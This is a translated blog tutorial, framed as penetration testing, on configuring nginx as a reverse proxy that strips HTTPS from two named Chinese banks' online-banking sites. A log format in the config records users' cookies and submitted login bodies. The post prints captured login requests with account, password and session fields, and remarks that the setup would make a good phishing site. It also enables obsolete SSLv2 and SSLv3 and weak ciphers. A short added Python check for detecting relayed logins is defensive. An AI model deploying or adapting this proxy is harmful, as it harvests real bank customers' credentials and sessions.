Intercepting HTTPS data with nginx

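Although HTTPS is encrypted, there are still ways to analyse it locally, such as process injection (search Google for those; they are too advanced). I came across a simple method online and am noting it down here.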

Appendix: capturing traffic on the local machine with Wireshark: http://wiki.wireshark.org/CaptureSetup/Loopback (see "Other Alternatives"). Changing the route is the simplest option.


Original post: http://blog.chinaunix.net/space.php?uid=11170468&do=blog&id=2903067


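During a penetration test you will run into HTTPS-encrypted web pages that the usual tools cannot work on directly. Web server software can be used to forward the pages, which removes the encryption on the client side. nginx is used for the test here.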

 

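Set up an nginx server and edit the configuration file /etc/nginx/sites-available/default. The configuration below uses China Minsheng Bank's personal online banking as the example.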

# You may add here your
# server {
# ...
# }
# statements for each of your virtual hosts

server {
        listen 80;
        server_name localhost;

        access_log /var/log/nginx/localhost.access.log;

        location / {
                index index.htm index.html;
                proxy_pass https://ebank.cmbc.com.cn/; 
        }

}


Setting proxy_pass https://ebank.cmbc.com.cn/; makes nginx act as a proxy server. After restarting the service, access the nginx server at http://192.168.52.129/index_NonPrivate.html:

 
Capture the submitted data with WSockExpert:
 

POST /weblogic/servlets/EService/CSM/NonPrivateLogin?channelID=&PriErrPage=PriErrPage.html HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword,application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument,application/xaml+xml, */*
Referer: http://192.168.52.129/weblogic/nonsecindex.jsp?channelID=
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: 192.168.52.129
Content-Length: 78
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: JSESSIONID=KMhkvGWG51B1f3y37MXvpkqSWvc8vcShLcjnchyLQSzyQq32C5nh!1655737129!270743917; K-JSESSIONID-lgnlbcme=3334A3537EB07580F51C46CFC8ABF69C

logintype=u&txcode=c99900&account=11111111111&loginPwd=222222&CheckCode=333333
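
Seen from the origin server, the request above stands out: nginx's proxy_pass rewrites Host to the upstream name by default but forwards Referer unchanged. The check below is an added example, not code from the original post; TRUSTED_HOSTS and the sample requests are assumptions constructed from the capture above.

```python
from urllib.parse import urlsplit

# Assumption: the hostnames the real site serves its login pages from.
TRUSTED_HOSTS = {"ebank.cmbc.com.cn"}

# Constructed sample: the POST captured above as the origin server would
# receive it (Host rewritten by the proxy, Referer forwarded untouched).
PROXIED = (
    "POST /weblogic/servlets/EService/CSM/NonPrivateLogin?channelID= HTTP/1.1\r\n"
    "Referer: http://192.168.52.129/weblogic/nonsecindex.jsp?channelID=\r\n"
    "Host: ebank.cmbc.com.cn\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
)
# Constructed sample: the same login submitted directly to the real site.
DIRECT = PROXIED.replace("http://192.168.52.129/", "https://ebank.cmbc.com.cn/")


def parse_headers(raw):
    """Return (method, {lower-cased header name: value}) from a raw request head."""
    head = raw.split("\r\n\r\n", 1)[0].split("\r\n")
    method = head[0].split(" ", 1)[0]
    headers = {}
    for line in head[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, headers


def check_login_request(raw):
    """Return the reasons a login POST looks relayed; an empty list means clean."""
    method, headers = parse_headers(raw)
    if method != "POST":
        return []
    findings = []
    for name in ("origin", "referer"):
        value = headers.get(name)
        if value is None:
            continue
        parts = urlsplit(value)
        if parts.scheme != "https":
            findings.append(f"{name} scheme is {parts.scheme or 'missing'!r}, not https")
        if (parts.hostname or "") not in TRUSTED_HOSTS:
            findings.append(f"{name} host {parts.hostname!r} is not a site host")
    if "origin" not in headers and "referer" not in headers:
        findings.append("no Origin or Referer on a login POST")
    return findings
```

The check is a heuristic: it flags a relay that forwards request headers unchanged, as the configuration above does.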

To log the content submitted through the nginx proxy, modify the default configuration file.

# log_format is only valid at http level (this file is included there),
# and it must be defined before the access_log line that refers to it.
log_format main '$remote_addr - [$time_local] $request ||||| $http_cookie ||||| $request_body';

# HTTPS server
#
server {
        listen 443;
        server_name 192.168.52.129;

        ssl on;
        ssl_certificate ssl/cert.crt;
        ssl_certificate_key ssl/cert.key;

        ssl_session_timeout 5m;

        ssl_protocols SSLv2 SSLv3 TLSv1;
        ssl_ciphers ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP;
        ssl_prefer_server_ciphers on;

        location / {
# root /etc/nginx/html;
# index index.html index.htm;
                proxy_pass https://pbsz.ebank.cmbchina.com/;
        }

        access_log /var/log/nginx/access.log main;
}

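The log file records $http_cookie (the cookie information) and $request_body (the HTTP request body); this example uses China Merchants Bank's personal online banking. If a certificate validated by a certificate authority were also obtained, the site would make a rather good phishing site.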

Below is one captured log entry. It contains the URL, the cookie and the submitted HTTP body:

192.168.52.1 - [05/Oct/2009:14:27:24 +0800] POST /CmbBank_GenShell/UI/GenShellPC/Login/GenLogin.aspx HTTP/1.||||| CMB_GenServer=Lo
ginType:A&BranchNo:0010&CreditCardType:A&IdType:01 ||||| ClientNo=015C3BBB172525FEBE9231E3448941E1515070230094203100051384&ExtraPwd=
3333&BranchNo=0010&AccountNo=ipJSoiVbS3HNMcI-3vYQsHiFp0WLlDsX9-eWKN97PbekdnzNzVg288TJCW6VdxDpufQfejoTCe-uSmgWZL67AQ__&Password=ikS2P
-JmservIWpMgda8hHEzLJA04Aa6viJx0QF2zrWUDlxiLpLTbqhbVNbfqgA0c7ipLQ0zLi3fEjZJAPRdMA__&HardStamp=Aj8wMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0ND
g5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NElGYmltRWVOyyIm2848AfJ9ZSdePA9n6S4j8Yf212z5y2pbjApY1HinUJmJCwGL48QLiWo8*Fmm75fzVtjTH9*fjI2qx*
CEXUKkf93ltwsSq5*UvM7zkGgCaCHXQPLF396CtYjkyC82CMVIHcB89kIq*iEF7XMXCbqKloHsh5LHSCYim0wKa28GzWczV2zX9tcqGkGAPwPXuzwTF3lk7BxZstXnFx59KK
jVerd8V5RNf-JAGe0aBSgt3CxxJQ__&Licex=AjgwMTVDM0JCQjE3MjUyNUZFQkU5MjMxRTM0NDg5NDFFMTUxNTA3MDIzMDA5NDIwMzEwMDA1MTM4NAAAAAAAAACqPBt4PB7
VfxBrLCVptuY12saTrYLj9xrwnsmeVMxt5O4K9LASxMNND3gZ8QOr2eQavsKgpUfsscvzXohvN7E4tbJocTwnpx6SJRsNjXImZDYP*Tq0YjH6i2ZbZu0m7gtnL01ibfqjTxM
a4vplPyCLgQ__&LoginType=A


